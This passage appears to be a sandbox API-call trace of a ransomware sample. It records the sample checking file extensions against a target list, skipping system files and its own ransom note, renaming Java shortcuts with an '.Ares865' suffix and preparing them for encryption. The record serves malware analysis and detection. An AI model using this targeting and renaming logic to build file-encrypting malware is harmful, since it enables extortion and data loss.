lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0067.335] lstrlenW (lpString="flexolibrary") returned 12 [0067.335] lstrcmpiW (lpString1=" Updates.lnk", lpString2="flexolibrary") returned -1 [0067.335] lstrlenW (lpString="fm5") returned 3 [0067.335] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0067.335] lstrlenW (lpString="fmp") returned 3 [0067.335] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0067.336] lstrlenW (lpString="fmp12") returned 5 [0067.336] lstrcmpiW (lpString1="s.lnk", lpString2="fmp12") returned 1 [0067.336] lstrlenW (lpString="fmpsl") returned 5 [0067.336] lstrcmpiW (lpString1="s.lnk", lpString2="fmpsl") returned 1 [0067.336] lstrlenW (lpString="fol") returned 3 [0067.336] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0067.336] lstrlenW (lpString="fp3") returned 3 [0067.336] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0067.336] lstrlenW (lpString="fp4") returned 3 [0067.336] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0067.336] lstrlenW (lpString="fp5") returned 3 [0067.336] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0067.336] lstrlenW (lpString="fp7") returned 3 [0067.336] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0067.336] lstrlenW (lpString="fpt") returned 3 [0067.336] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0067.336] lstrlenW (lpString="frm") returned 3 [0067.336] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0067.336] lstrlenW (lpString="gdb") returned 3 [0067.336] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0067.336] lstrlenW (lpString="gdb") returned 3 [0067.336] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0067.336] lstrlenW (lpString="grdb") returned 4 [0067.336] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0067.336] lstrlenW (lpString="gwi") returned 3 [0067.336] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0067.336] lstrlenW (lpString="hdb") returned 3 [0067.336] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0067.336] lstrlenW (lpString="his") returned 3 [0067.336] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0067.336] lstrlenW (lpString="ib") returned 2 [0067.336] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0067.336] lstrlenW (lpString="idb") returned 3 [0067.336] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0067.336] lstrlenW (lpString="ihx") returned 3 [0067.336] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0067.336] lstrlenW (lpString="itdb") returned 4 [0067.336] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0067.337] lstrlenW (lpString="itw") returned 3 [0067.337] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0067.337] lstrlenW (lpString="jet") returned 3 [0067.337] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0067.337] lstrlenW (lpString="jtx") returned 3 [0067.337] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0067.337] lstrlenW (lpString="kdb") returned 3 [0067.337] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0067.337] lstrlenW (lpString="kexi") returned 4 [0067.337] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0067.337] lstrlenW (lpString="kexic") returned 5 [0067.337] lstrcmpiW (lpString1="s.lnk", lpString2="kexic") returned 1 [0067.337] lstrlenW (lpString="kexis") returned 5 [0067.337] lstrcmpiW (lpString1="s.lnk", lpString2="kexis") returned 1 [0067.337] lstrlenW (lpString="lgc") returned 3 [0067.337] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0067.337] lstrlenW (lpString="lwx") returned 3 [0067.337] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0067.337] lstrlenW (lpString="maf") returned 3 [0067.337] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0067.337] lstrlenW (lpString="maq") returned 3 [0067.337] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0067.337] lstrlenW (lpString="mar") returned 3 [0067.337] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0067.337] lstrlenW (lpString="marshal") returned 7 [0067.337] lstrcmpiW (lpString1="tes.lnk", lpString2="marshal") returned 1 [0067.337] lstrlenW (lpString="mas") returned 3 [0067.337] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0067.337] lstrlenW (lpString="mav") returned 3 [0067.337] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0067.337] lstrlenW (lpString="maw") returned 3 [0067.337] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0067.337] lstrlenW (lpString="mdbhtml") returned 7 [0067.337] lstrcmpiW (lpString1="tes.lnk", lpString2="mdbhtml") returned 1 [0067.337] lstrlenW (lpString="mdn") returned 3 [0067.337] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0067.337] lstrlenW (lpString="mdt") returned 3 [0067.338] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0067.338] lstrlenW (lpString="mfd") returned 3 [0067.338] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0067.338] lstrlenW (lpString="mpd") returned 3 [0067.338] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0067.338] lstrlenW (lpString="mrg") returned 3 [0067.338] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0067.338] lstrlenW (lpString="mud") returned 3 [0067.338] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0067.338] lstrlenW (lpString="mwb") returned 3 [0067.338] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0067.338] lstrlenW (lpString="myd") returned 3 [0067.338] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0067.338] lstrlenW (lpString="ndf") returned 3 [0067.338] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0067.338] lstrlenW (lpString="nnt") returned 3 [0067.338] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0067.338] lstrlenW (lpString="nrmlib") returned 6 [0067.338] lstrcmpiW (lpString1="es.lnk", lpString2="nrmlib") returned -1 [0067.338] lstrlenW (lpString="ns2") returned 3 [0067.338] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0067.338] lstrlenW (lpString="ns3") returned 3 [0067.338] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0067.338] lstrlenW (lpString="ns4") returned 3 [0067.338] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0067.338] lstrlenW (lpString="nsf") returned 3 [0067.338] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0067.338] lstrlenW (lpString="nv") returned 2 [0067.338] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0067.338] lstrlenW (lpString="nv2") returned 3 [0067.338] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0067.338] lstrlenW (lpString="nwdb") returned 4 [0067.338] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0067.338] lstrlenW (lpString="nyf") returned 3 [0067.338] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0067.338] lstrlenW (lpString="odb") returned 3 [0067.338] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0067.338] lstrlenW (lpString="odb") returned 3 [0067.339] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0067.339] lstrlenW (lpString="oqy") returned 3 [0067.339] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0067.339] lstrlenW (lpString="ora") returned 3 [0067.339] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0067.339] lstrlenW (lpString="orx") returned 3 [0067.339] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0067.339] lstrlenW (lpString="owc") returned 3 [0067.339] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0067.339] lstrlenW (lpString="p96") returned 3 [0067.339] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0067.339] lstrlenW (lpString="p97") returned 3 [0067.339] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0067.339] lstrlenW (lpString="pan") returned 3 [0067.339] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0067.339] lstrlenW (lpString="pdb") returned 3 [0067.339] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0067.339] lstrlenW (lpString="pdm") returned 3 [0067.339] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0067.339] lstrlenW (lpString="pnz") returned 3 [0067.386] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0067.386] lstrlenW (lpString="qry") returned 3 [0067.386] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0067.386] lstrlenW (lpString="qvd") returned 3 [0067.386] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0067.386] lstrlenW (lpString="rbf") returned 3 [0067.386] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0067.386] lstrlenW (lpString="rctd") returned 4 [0067.386] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0067.386] lstrlenW (lpString="rod") returned 3 [0067.386] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0067.386] lstrlenW (lpString="rodx") returned 4 [0067.387] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0067.387] lstrlenW (lpString="rpd") returned 3 [0067.387] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0067.387] lstrlenW (lpString="rsd") returned 3 [0067.387] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0067.387] lstrlenW (lpString="sas7bdat") returned 8 [0067.387] lstrcmpiW (lpString1="ates.lnk", lpString2="sas7bdat") returned -1 [0067.387] lstrlenW (lpString="sbf") returned 3 [0067.387] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0067.387] lstrlenW (lpString="scx") returned 3 [0067.387] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0067.387] lstrlenW (lpString="sdb") returned 3 [0067.387] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0067.387] lstrlenW (lpString="sdc") returned 3 [0067.387] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0067.387] lstrlenW (lpString="sdf") returned 3 [0067.387] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0067.387] lstrlenW (lpString="sis") returned 3 [0067.387] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0067.387] lstrlenW (lpString="spq") returned 3 [0067.387] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0067.387] lstrlenW (lpString="te") returned 2 [0067.387] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0067.387] lstrlenW (lpString="teacher") returned 7 [0067.387] lstrcmpiW (lpString1="tes.lnk", lpString2="teacher") returned 1 [0067.387] lstrlenW (lpString="tmd") returned 3 [0067.387] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0067.387] lstrlenW (lpString="tps") returned 3 [0067.387] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0067.387] lstrlenW (lpString="trc") returned 3 [0067.387] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0067.387] lstrlenW (lpString="trc") returned 3 [0067.387] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0067.387] lstrlenW (lpString="trm") returned 3 [0067.387] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0067.387] lstrlenW (lpString="udb") returned 3 [0067.387] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0067.387] lstrlenW (lpString="udl") returned 3 [0067.388] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0067.388] lstrlenW (lpString="usr") returned 3 [0067.388] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0067.388] lstrlenW (lpString="v12") returned 3 [0067.388] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0067.388] lstrlenW (lpString="vis") returned 3 [0067.388] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0067.388] lstrlenW (lpString="vpd") returned 3 [0067.388] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0067.388] lstrlenW (lpString="vvv") returned 3 [0067.388] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0067.388] lstrlenW (lpString="wdb") returned 3 [0067.388] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0067.388] lstrlenW (lpString="wmdb") returned 4 [0067.388] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0067.388] lstrlenW (lpString="wrk") returned 3 [0067.388] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0067.388] lstrlenW (lpString="xdb") returned 3 [0067.388] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0067.388] lstrlenW (lpString="xld") returned 3 [0067.388] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0067.388] lstrlenW (lpString="xmlff") returned 5 [0067.388] lstrcmpiW (lpString1="s.lnk", lpString2="xmlff") returned -1 [0067.388] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\Check For Updates.lnk.Ares865") returned 73 [0067.388] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\Check For Updates.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\java\\check for updates.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\Check For Updates.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\java\\check for updates.lnk.ares865"), dwFlags=0x1) returned 1 [0067.394] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\Check For Updates.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\java\\check for updates.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.394] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2017) returned 1 [0067.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0067.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.394] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0067.395] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.395] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.395] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xaf0, lpName=0x0) returned 0x164 [0067.396] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaf0) returned 0x1a0000 [0067.400] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0067.401] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.401] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.401] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.401] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.401] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.401] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.401] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.401] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.401] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.401] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.401] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.401] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.401] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0067.401] CloseHandle (hObject=0x164) returned 1 [0067.402] CloseHandle (hObject=0x12c) returned 1 [0067.402] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.402] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.402] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0067.402] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x762a4380, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x762a4380, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x762ca4e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x7b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Configure Java.lnk", cAlternateFileName="CONFIG~1.LNK")) returned 1 [0067.402] lstrcmpiW (lpString1="Configure Java.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.402] lstrcmpiW (lpString1="Configure Java.lnk", lpString2="aoldtz.exe") returned 1 [0067.402] lstrcmpiW (lpString1="Configure Java.lnk", lpString2=".") returned 1 [0067.402] lstrcmpiW (lpString1="Configure Java.lnk", lpString2="..") returned 1 [0067.402] lstrcmpiW (lpString1="Configure Java.lnk", lpString2="windows") returned -1 [0067.402] lstrcmpiW (lpString1="Configure Java.lnk", lpString2="bootmgr") returned 1 [0067.402] lstrcmpiW (lpString1="Configure Java.lnk", lpString2="temp") returned -1 [0067.402] lstrcmpiW (lpString1="Configure Java.lnk", lpString2="pagefile.sys") returned -1 [0067.402] lstrcmpiW (lpString1="Configure Java.lnk", lpString2="boot") returned 1 [0067.402] lstrcmpiW (lpString1="Configure Java.lnk", lpString2="ids.txt") returned -1 [0067.402] lstrcmpiW (lpString1="Configure Java.lnk", lpString2="ntuser.dat") returned -1 [0067.402] lstrcmpiW (lpString1="Configure Java.lnk", lpString2="perflogs") returned -1 [0067.402] lstrcmpiW (lpString1="Configure Java.lnk", lpString2="MSBuild") returned -1 [0067.402] lstrlenW (lpString="Configure Java.lnk") returned 18 [0067.402] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\Check For Updates.lnk") returned 65 [0067.402] lstrcpyW (in: lpString1=0x2cce458, lpString2="Configure Java.lnk" | out: lpString1="Configure Java.lnk") returned="Configure Java.lnk" [0067.402] lstrlenW (lpString="Configure Java.lnk") returned 18 [0067.402] lstrlenW (lpString="Ares865") returned 7 [0067.402] lstrcmpiW (lpString1="ava.lnk", lpString2="Ares865") returned 1 [0067.402] lstrlenW (lpString=".dll") returned 4 [0067.402] lstrcmpiW (lpString1="Configure Java.lnk", lpString2=".dll") returned 1 [0067.402] lstrlenW (lpString=".lnk") returned 4 [0067.403] lstrcmpiW (lpString1="Configure Java.lnk", lpString2=".lnk") returned 1 [0067.403] lstrlenW (lpString=".ini") returned 4 [0067.403] lstrcmpiW (lpString1="Configure Java.lnk", lpString2=".ini") returned 1 [0067.403] lstrlenW (lpString=".sys") returned 4 [0067.403] lstrcmpiW (lpString1="Configure Java.lnk", lpString2=".sys") returned 1 [0067.403] lstrlenW (lpString="Configure Java.lnk") returned 18 [0067.403] lstrlenW (lpString="bak") returned 3 [0067.403] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0067.403] lstrlenW (lpString="ba_") returned 3 [0067.403] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0067.403] lstrlenW (lpString="dbb") returned 3 [0067.403] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0067.403] lstrlenW (lpString="vmdk") returned 4 [0067.403] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0067.403] lstrlenW (lpString="rar") returned 3 [0067.403] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0067.403] lstrlenW (lpString="zip") returned 3 [0067.403] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0067.403] lstrlenW (lpString="tgz") returned 3 [0067.403] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0067.403] lstrlenW (lpString="vbox") returned 4 [0067.403] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0067.403] lstrlenW (lpString="vdi") returned 3 [0067.403] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0067.403] lstrlenW (lpString="vhd") returned 3 [0067.403] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0067.403] lstrlenW (lpString="vhdx") returned 4 [0067.403] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0067.403] lstrlenW (lpString="avhd") returned 4 [0067.403] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0067.403] lstrlenW (lpString="db") returned 2 [0067.403] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0067.403] lstrlenW (lpString="db2") returned 3 [0067.403] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0067.403] lstrlenW (lpString="db3") returned 3 [0067.403] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0067.404] lstrlenW (lpString="dbf") returned 3 [0067.404] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0067.404] lstrlenW (lpString="mdf") returned 3 [0067.404] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0067.404] lstrlenW (lpString="mdb") returned 3 [0067.404] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0067.404] lstrlenW (lpString="sql") returned 3 [0067.404] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0067.404] lstrlenW (lpString="sqlite") returned 6 [0067.404] lstrcmpiW (lpString1="va.lnk", lpString2="sqlite") returned 1 [0067.404] lstrlenW (lpString="sqlite3") returned 7 [0067.404] lstrcmpiW (lpString1="ava.lnk", lpString2="sqlite3") returned -1 [0067.404] lstrlenW (lpString="sqlitedb") returned 8 [0067.404] lstrcmpiW (lpString1="Java.lnk", lpString2="sqlitedb") returned -1 [0067.404] lstrlenW (lpString="xml") returned 3 [0067.404] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0067.404] lstrlenW (lpString="$er") returned 3 [0067.404] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0067.404] lstrlenW (lpString="4dd") returned 3 [0067.404] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0067.404] lstrlenW (lpString="4dl") returned 3 [0067.404] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0067.404] lstrlenW (lpString="^^^") returned 3 [0067.404] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0067.404] lstrlenW (lpString="abs") returned 3 [0067.404] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0067.404] lstrlenW (lpString="abx") returned 3 [0067.404] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0067.404] lstrlenW (lpString="accdb") returned 5 [0067.404] lstrcmpiW (lpString1="a.lnk", lpString2="accdb") returned -1 [0067.404] lstrlenW (lpString="accdc") returned 5 [0067.404] lstrcmpiW (lpString1="a.lnk", lpString2="accdc") returned -1 [0067.404] lstrlenW (lpString="accde") returned 5 [0067.404] lstrcmpiW (lpString1="a.lnk", lpString2="accde") returned -1 [0067.404] lstrlenW (lpString="accdr") returned 5 [0067.404] lstrcmpiW (lpString1="a.lnk", lpString2="accdr") returned -1 [0067.404] lstrlenW (lpString="accdt") returned 5 [0067.404] lstrcmpiW (lpString1="a.lnk", lpString2="accdt") returned -1 [0067.405] lstrlenW (lpString="accdw") returned 5 [0067.405] lstrcmpiW (lpString1="a.lnk", lpString2="accdw") returned -1 [0067.405] lstrlenW (lpString="accft") returned 5 [0067.405] lstrcmpiW (lpString1="a.lnk", lpString2="accft") returned -1 [0067.405] lstrlenW (lpString="adb") returned 3 [0067.405] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0067.405] lstrlenW (lpString="adb") returned 3 [0067.405] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0067.405] lstrlenW (lpString="ade") returned 3 [0067.405] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0067.405] lstrlenW (lpString="adf") returned 3 [0067.405] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0067.405] lstrlenW (lpString="adn") returned 3 [0067.405] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0067.405] lstrlenW (lpString="adp") returned 3 [0067.405] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0067.405] lstrlenW (lpString="alf") returned 3 [0067.405] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0067.405] lstrlenW (lpString="ask") returned 3 [0067.405] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0067.405] lstrlenW (lpString="btr") returned 3 [0067.405] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0067.405] lstrlenW (lpString="cat") returned 3 [0067.405] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0067.405] lstrlenW (lpString="cdb") returned 3 [0067.405] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0067.405] lstrlenW (lpString="ckp") returned 3 [0067.405] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0067.405] lstrlenW (lpString="cma") returned 3 [0067.405] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0067.405] lstrlenW (lpString="cpd") returned 3 [0067.405] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0067.405] lstrlenW (lpString="dacpac") returned 6 [0067.405] lstrcmpiW (lpString1="va.lnk", lpString2="dacpac") returned 1 [0067.405] lstrlenW (lpString="dad") returned 3 [0067.405] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0067.405] lstrlenW (lpString="dadiagrams") returned 10 [0067.405] lstrcmpiW (lpString1="e Java.lnk", lpString2="dadiagrams") returned 1 [0067.406] lstrlenW (lpString="daschema") returned 8 [0067.406] lstrcmpiW (lpString1="Java.lnk", lpString2="daschema") returned 1 [0067.406] lstrlenW (lpString="db-journal") returned 10 [0067.406] lstrcmpiW (lpString1="e Java.lnk", lpString2="db-journal") returned 1 [0067.406] lstrlenW (lpString="db-shm") returned 6 [0067.406] lstrcmpiW (lpString1="va.lnk", lpString2="db-shm") returned 1 [0067.406] lstrlenW (lpString="db-wal") returned 6 [0067.406] lstrcmpiW (lpString1="va.lnk", lpString2="db-wal") returned 1 [0067.406] lstrlenW (lpString="dbc") returned 3 [0067.406] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0067.406] lstrlenW (lpString="dbs") returned 3 [0067.406] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0067.406] lstrlenW (lpString="dbt") returned 3 [0067.406] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0067.406] lstrlenW (lpString="dbv") returned 3 [0067.406] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0067.406] lstrlenW (lpString="dbx") returned 3 [0067.406] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0067.406] lstrlenW (lpString="dcb") returned 3 [0067.406] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0067.406] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\Configure Java.lnk.Ares865") returned 70 [0067.406] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\Configure Java.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\java\\configure java.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\Configure Java.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\java\\configure java.lnk.ares865"), dwFlags=0x1) returned 1 [0067.411] CreateFileW 